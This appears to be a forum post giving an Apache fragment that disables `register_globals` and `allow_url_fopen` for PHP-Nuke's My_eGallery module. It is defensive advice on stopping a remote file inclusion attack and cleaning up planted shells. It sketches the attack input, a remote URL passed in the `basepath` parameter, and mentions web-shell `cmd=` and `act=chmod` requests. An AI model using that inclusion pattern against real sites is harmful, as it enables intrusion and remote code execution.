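A server-side complement to the guard above, as an added example (not montego's code and not part of My_eGallery): the log lines earlier in the thread depend on two PHP settings, `register_globals` (so that `?basepath=http://...` becomes `$basepath` inside the script) and `allow_url_fopen` (so that `include()` will fetch that URL). This Apache fragment turns both off for the module directory; the path is an assumption.

```apache
# Added example, not from the thread or from My_eGallery. Path assumed.
<Directory "/var/www/modules/My_eGallery">
    # Without register_globals, ?basepath=http://... no longer creates $basepath;
    # the include() then uses whatever the script itself sets.
    php_admin_flag register_globals off
    # Without allow_url_fopen, include("http://...") fails even if a variable
    # does get through, so the remote shell is never fetched.
    php_admin_flag allow_url_fopen off
</Directory>
```

Check afterwards that PHP-Nuke's mainfile.php does not re-create the request globals itself when `register_globals` is off (look for `import_request_variables` or an `extract()` over `$_GET`/`$_POST`), since that would undo the first line; the second line stands on its own, at the cost of breaking any legitimate `fopen()` of an http:// URL inside the module. Neither setting removes a shell that is already on disk: the `act=chmod` and `cmd=` lines in the log show files being changed and run under /var/www, /tmp and /var/tmp, and those need to be cleaned up separately.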